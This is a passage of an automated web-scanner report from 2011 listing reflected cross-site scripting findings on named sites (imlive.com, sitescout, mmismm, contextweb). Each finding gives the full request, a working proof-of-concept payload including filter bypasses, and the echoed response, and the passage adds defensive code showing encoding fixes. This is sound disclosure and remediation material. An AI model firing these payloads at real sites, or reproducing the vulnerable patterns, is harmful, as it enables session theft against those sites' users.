GET /?%00ba898"><script>alert(1)</script>ea1f44e02c1=1 HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uf21xp55pihpngiikgmtjpi1; path=/; HttpOnly
Set-Cookie: spvdr=vd=ca385023-6a55-4da9-9adc-27df877ab4ee&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:22 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 21515
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00ba898"><script>alert(1)</script>ea1f44e02c1~1');return false;">
...[SNIP]...

4.729. http://ru.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a0cf'onerror%3d'alert(1)'9653cda9fbc was submitted in the gotopage parameter. This input was echoed as 8a0cf'onerror='alert(1)'9653cda9fbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/8a0cf'onerror%3d'alert(1)'9653cda9fbc HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iru=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSQQASC=MBDGAJMAPJDFGCLMLOHPEKEG; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=ru.imlive.com&ul=/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://ru.imlive.com:80/webcam-login/8a0cf'onerror='alert(1)'9653cda9fbc/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.730. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955da'-alert(1)-'35a7f28024d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?955da'-alert(1)-'35a7f28024d=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=cxo1wv55m2eptp452f1nrc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 18822
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/?955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&qs=955da'-alert(1)-'35a7f28024d=1&iy=dallas&id=44&iu=1&vd=b1cdde81-f68f-4457-8c41-9bd67759ee7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.731. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13=1 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0tjglprt0uhefg450loh0w45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a76d7abf-e00b-41da-8545-88bfbdcb7dc0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:24 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 19198
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||6521b"><script>alert(1)</script>71abce1a13~1');return false;">
...[SNIP]...

4.732. http://se.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50044'onerror%3d'alert(1)'c69d85712e5 was submitted in the gotopage parameter. This input was echoed as 50044'onerror='alert(1)'c69d85712e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
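The four imlive.com findings above (4.728 through 4.732) are the same bug seen through two weak filters: a blacklist that is case-sensitive (defeated by ScRiPt), a blacklist that stops reading at a NUL byte (defeated by %00), and, on the 404 page, a single-quoted attribute that is not encoded at all (defeated by 'onerror='). The following is an added example, not code from the report or from imlive.com: the filter and rendering functions are assumptions that reconstruct the behaviour the scanner observed, since the report shows only reflected output, not server-side source.

```javascript
// Added example, not code from the report or from imlive.com: a reconstruction
// of the two filter weaknesses the scanner exercised (case-sensitive "script"
// blacklist, NUL-terminated check) and a context-aware replacement. The filter
// and rendering functions are assumptions about the server-side code, which the
// report does not show; only the reflected output shapes come from the report.

// Blacklist 1: case-sensitive match, defeated by "ScRiPt".
function naiveBlacklist(value) {
  return value.includes('<script') ? '' : value;
}

// Blacklist 2: models a native-code filter that treats the string as
// NUL-terminated. It inspects only the bytes before the first \0; the managed
// application behind it consumes the whole value.
function nulTerminatedBlacklist(value) {
  const inspected = value.split('\0')[0];
  return /<script/i.test(inspected) ? '' : value;
}

// Vulnerable rendering, shaped like the onclick reflection at /: the parameter
// name is concatenated into a JS string literal inside an HTML attribute.
function renderLinkVulnerable(paramName, filter) {
  return '<a class="StaticLink" onclick="dAccess(\'http://imlive.com/uaccess/0/||' +
    filter(paramName) + '~1\');return false;">';
}

// Fix: encode for each context the value passes through, innermost first.
// JS string literal -> \uXXXX escapes for everything that can end the literal,
// start a tag, or terminate a line.
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<>&\u2028\u2029\0]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// HTML attribute -> entity-encode the five characters that can end the value.
function htmlAttrEncode(s) {
  return String(s).replace(/[&<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

function renderLinkSafe(paramName) {
  const handler = "dAccess('http://imlive.com/uaccess/0/||" +
    jsStringEscape(paramName) + "~1');return false;";
  return '<a class="StaticLink" onclick="' + htmlAttrEncode(handler) + '">';
}

// Same idea for the single-quoted img src on the 404 page: the onerror payload
// only works because the quote is written raw. encodeURIComponent leaves '
// alone, which is why the attribute encoding is still needed on top of it.
function renderBeaconVulnerable(path) {
  return "<img name='an' src='http://analytic.imlive.com/w.gif?ul=" + path +
    "' height='1' width='1'>";
}
function renderBeaconSafe(path) {
  return "<img name='an' src='http://analytic.imlive.com/w.gif?ul=" +
    htmlAttrEncode(encodeURIComponent(path)) + "' height='1' width='1'>";
}

// Crude oracle used by the checks: does the markup contain a script tag, or an
// event handler that starts right after a quote, i.e. outside the intended value?
function hasInjectedHandler(html) {
  return /<script/i.test(html) || /'\s*onerror\s*=/i.test(html);
}

const casePayload = '6521b"><ScRiPt>alert(1)</ScRiPt>71abce1a13'; // payload from finding 4.731
console.log(renderLinkVulnerable(casePayload, naiveBlacklist));
console.log(renderLinkSafe(casePayload));
```

The point of the two encoders is ordering: the value sits in a JavaScript string that sits in an HTML attribute, so it is escaped for JavaScript first and the whole handler is entity-encoded second. A single blacklist, however complete, cannot express that.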

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=50044'onerror%3d'alert(1)'c69d85712e5 HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:34 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ise=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRSRDRD=OMEHEKMACGAIHNLGCDDKMGHM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:34 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=se.imlive.com&ul=/waccess/50044'onerror='alert(1)'c69d85712e5/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://se.imlive.com:80/waccess/50044'onerror='alert(1)'c69d85712e5/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.733. http://smm.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e82fb'%3balert(1)//18af4187165 was submitted in the h parameter. This input was echoed as e82fb';alert(1)//18af4187165 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the reflected string is itself written into the document as the HEIGHT attribute of an IFRAME tag (see the response below), so the value crosses two contexts, a JavaScript string and then an HTML attribute, and a fix has to encode for both.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=79C8ECB&w=300&h=250e82fb'%3balert(1)//18af4187165&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 822
Date: Fri, 28 Jan 2011 17:00:30 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250e82fb';alert(1)//18af4187165" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.734. http://smm.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498fa"%3balert(1)//6c93725137d was submitted in the pid parameter. This input was echoed as 498fa";alert(1)//6c93725137d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=79C8ECB498fa"%3balert(1)//6c93725137d&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 822
Date: Fri, 28 Jan 2011 17:00:26 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB498fa";alert(1)//6c93725137d&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBA
...[SNIP]...

4.735. http://smm.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca607'%3balert(1)//e817e7d55a9 was submitted in the w parameter. This input was echoed as ca607';alert(1)//e817e7d55a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=79C8ECB&w=300ca607'%3balert(1)//e817e7d55a9&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 822
Date: Fri, 28 Jan 2011 17:00:28 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=79C8ECB&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300ca607';alert(1)//e817e7d55a9" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.736. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf279'%3balert(1)//9e11ad01c81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf279';alert(1)//9e11ad01c81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?bf279'%3balert(1)//9e11ad01c81=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:39:45 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 07:39:45 GMT; path=/; domain=.mmismm.com
Content-Length: 493
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?bf279';alert(1)//9e11ad01c81=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'&mm_pub='+mm_client+'&mm_channel='+mm_channel+'">
...[SNIP]...

4.737. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7085a%3balert(1)//2098f28910d was submitted in the action parameter. This input was echoed as 7085a;alert(1)//2098f28910d in the application's response. In the response the echo appears inside var ca="VIEWAD7085a;alert(1)//2098f28910d";, which on its own would be a double-quoted string context. It counts as an unquoted expression only because the same request carries a trailing backslash in cwtagid (50151\): that backslash escapes the closing quote of the preceding var ct="50151\" literal, so the quotes that follow pair up differently and the action value lands outside any string. Whether the resulting script actually parses also depends on what is echoed between those shifted quotes (cwadformat here) and on the // comment swallowing the rest of the line, so verify this in a browser before treating it as a working exploit chain rather than a reflection.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
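Findings 4.724 through 4.726 (oggifinogi), 4.733 through 4.735 (sitescout), 4.736 (mmismm) and 4.737 (contextweb) all have the same root cause: a request value is concatenated into a JavaScript string literal in a dynamically generated script, and in the sitescout case that string is then used to build HTML on the client. The following is an added example, not code from the report or from any of the ad networks named in it; buildTagVulnerable and buildTagSafe are hypothetical server-side renderers that reproduce the reflection shape, example.invalid is a placeholder host, and the validation patterns are assumptions about what a width and a publisher id may hold.

```javascript
// Added example, not code from the report or from any ad network named in it.
// It reproduces the reflection shape behind the script-context findings
// (a request value concatenated into a JavaScript string literal, which is then
// used to build HTML) and shows the two fixes. buildTag* are hypothetical
// server-side renderers; example.invalid is a placeholder host.

// Vulnerable: ' and " in w / pid end the literal, as the ';alert(1)// and
// ";alert(1)// reflections in the report show.
function buildTagVulnerable(params) {
  return "var w = '" + params.w + "';\n" +
    "var pid = \"" + params.pid + "\";\n" +
    "var html = '<IFRAME SRC=\"http://example.invalid/disp?pid=' + pid + '\" WIDTH=\"' + w + '\">';";
}

// Fix 1, validation: a width and a publisher id have a small, known shape.
// (The patterns are assumptions about what these parameters may hold.)
const DIMENSION = /^[0-9]{1,4}(px)?$/;
const PUBLISHER_ID = /^[0-9A-F]{1,16}$/;
function validateParams(params) {
  if (!DIMENSION.test(params.w)) throw new TypeError('w: expected a pixel dimension');
  if (!PUBLISHER_ID.test(params.pid)) throw new TypeError('pid: expected a hex id');
  return params;
}

// Fix 2, output encoding: emit each value as a JavaScript literal. JSON.stringify
// handles quotes, backslashes and control characters; the extra replacements
// cover </script> (tag close inside a script block), & and the two Unicode
// line terminators that older engines treat as newlines inside a literal.
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The value crosses a second context when the client builds HTML from it, so
// the client-side code must encode again: URL-encode pid for the SRC query,
// attribute-encode w for WIDTH. htmlAttr is shipped as part of the script.
const CLIENT_HTML_ATTR =
  "function htmlAttr(s){return String(s).replace(/[&<>\"']/g,function(c){return '&#'+c.charCodeAt(0)+';';});}";

function buildTagSafe(params) {
  return CLIENT_HTML_ATTR + "\n" +
    "var w = " + jsLiteral(params.w) + ";\n" +
    "var pid = " + jsLiteral(params.pid) + ";\n" +
    "var html = '<IFRAME SRC=\"http://example.invalid/disp?pid=' + encodeURIComponent(pid) + '\" WIDTH=\"' + htmlAttr(w) + '\">';";
}

// Harness for the checks: run the generated script with a stub alert() that
// counts calls, and return what the script left in w, pid and html.
function runTag(src) {
  const calls = [];
  const result = new Function('alert', src + '\nreturn { w: w, pid: pid, html: html };')(
    (x) => calls.push(x));
  return Object.assign({ alerts: calls.length }, result);
}

// Payload taken from finding 4.735; the second value is a plausible publisher id.
const sample = { w: "300ca607';alert(1)//e817e7d55a9", pid: '79C8ECB' };
console.log(runTag(buildTagVulnerable(sample)).alerts, 'alert() call(s) from the vulnerable build');
console.log(runTag(buildTagSafe(sample)).html);
```

Validation is the stronger fix where it applies, because a width that must match a few digits cannot carry a payload at all; encoding is the fallback for values whose shape cannot be pinned down. Neither fix needs a blacklist, and the encoder works for single- and double-quoted literals alike since it chooses the delimiter itself.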

Request

GET /TagPublish/getjs.aspx?action=VIEWAD7085a%3balert(1)//2098f28910d&cwrun=200&cwadformat=300X250&cwpid=513102&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=50151\ HTTP/1.1
Host: tag.contextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
